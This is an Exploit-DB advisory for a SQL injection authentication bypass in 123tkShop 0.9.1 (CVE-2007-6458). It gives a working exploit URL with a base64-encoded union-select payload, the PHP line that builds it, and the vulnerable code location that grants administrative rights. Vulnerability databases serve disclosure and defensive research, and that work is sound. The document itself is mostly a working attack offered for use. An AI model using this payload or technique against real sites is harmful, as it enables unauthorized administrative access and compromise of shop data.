123tkShop 0.9.1 - Remote Authentication Bypass

EDB-ID:

4733

CVE:

2007-6458

EDB Verified:

Author:

Michael Brooks

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2007-12-14

Vulnerable App: 
By Michael Brooks
Vulnerability:Sql Injection 
Software:123tkShop
Homepage:http://sourceforge.net/projects/my123tkshop/
Affects Version 0.9.1. 

An attacker can gain Administrative rights with this authentication bypass exploit:
http://127.0.0.1/123tkShop/shop/admin.php?admin=J3VuaW9uIHNlbGVjdCAncGFzc3dvcmQnLyogOnBhc3N3b3Jk
The payload for the attack is constructed like this:
print base64_encode("'union select 'password'/* :password");

Vulneralbe code is in the ./123tkShop/shop/mainfile.php file in the is_admin function starting on line 156

The attack will work magic_quotes_gpc=On or off because of base64_decode()
The attack will also work with register_globals=Off or On because of mainfile.php line 42:
if (!ini_get("register_globals")) {
    import_request_variables('GPC');
}
Registering globals is dangerous. 

My advice is to use another shopping cart such as OsCommerce. 

An interesting side note is that this url http://127.0.0.1/123tkShop/shop/admin.php?admin=%22 will produce a message:
"I don't like you..."
Interesting sentence,  unfortunately for 123tkShop sentences do not defend against sql injection. 

Merry Christmas. 

# milw0rm.com [2007-12-14]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services